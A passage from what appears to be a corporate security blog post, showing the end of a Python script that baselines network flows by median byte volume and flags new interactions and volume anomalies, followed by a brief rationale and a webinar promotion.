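    """Map each (src, dst, dport) pair to the median bytes it moved in training."""
    volumes = defaultdict(list)
    for src, dst, dport, nbytes in flows:
        volumes[(src, dst, dport)].append(nbytes)
    return {pair: median(v) for pair, v in volumes.items()}


def interaction_map(baseline):
    """The map of entity interactions: which (destination, port) each source talks to."""
    graph = defaultdict(set)
    for src, dst, dport in baseline:
        graph[src].add((dst, dport))
    return dict(graph)


def score_flows(flows, baseline, volume_factor=5.0):
    """Return findings: unseen pairs and known pairs exceeding volume_factor x median."""
    findings = []
    for src, dst, dport, nbytes in flows:
        pair = (src, dst, dport)
        if pair not in baseline:
            findings.append(("new-interaction", pair, nbytes))
        elif nbytes > volume_factor * baseline[pair]:
            findings.append(("volume-anomaly", pair, nbytes))
    return findings


if __name__ == "__main__":
    base = learn_baseline(TRAINING)
    for src, peers in interaction_map(base).items():
        print(f"{src} normally talks to {sorted(peers)}")
    for kind, pair, nbytes in score_flows(OBSERVED, base):
        print(f"{kind}: {pair} moved {nbytes} bytes")
```

The median rather than the mean is used for the per-pair baseline so that one large transfer in the training window does not inflate the threshold and hide later ones; in production the training window would also need to be long enough to cover legitimate but infrequent interactions such as month-end jobs.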

In summary, security threats may be common to businesses and organizations of all types, but the way they are addressed can vary greatly. In the modern enterprise driven by mobility and cloud, architecting for security represents an opportunity for unprecedented agility. With a strategy built on identity as the new perimeter and continuous processes to protect, detect and respond to threats, a business can be as secure as it is productive. Watch the on-demand webinar, Top 5 Security Threats, with Julia White and me to hear more about our approach to cybersecurity, or visit us at Microsoft Secure to learn more about security.

Categories: cybersecurity, security, Tips & Talk